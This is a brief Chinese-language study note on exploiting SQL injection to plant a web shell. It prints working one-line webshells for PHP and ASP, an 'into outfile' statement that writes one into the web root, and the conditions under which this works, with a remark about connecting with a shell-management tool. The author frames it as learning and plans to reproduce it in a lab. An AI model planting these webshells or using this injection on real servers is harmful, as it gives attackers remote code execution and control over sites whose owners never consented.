就是通过sql Inject漏洞写入恶意代码
一句话木马
php:
<?php @eval($_POST['mxh']);?>asp:
<%eval request(“mxh”)%>
里面’’ “” 又是一个新问题,hhh,不过经过研究了解了
select 1,2 into outfile “/var/www/html/1.php”
**作用详解:**into outfile 将select 的结果写入到指定目录的文件中,然后访问获取权限,例如菜刀…
条件:
1.需要知道远程目录
2.需要远程目录有写权限
3.需要数据库开启了secure_file_priv
Tips:自己在曾经利用p7做linux渗透的时候根本只知道了如何利用,但还不会反过来
了解他怎么写出来,怎么防御的,没有基础学是真的难!!!
自己可以尝试搭建一下,虽然…
任务:复现
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。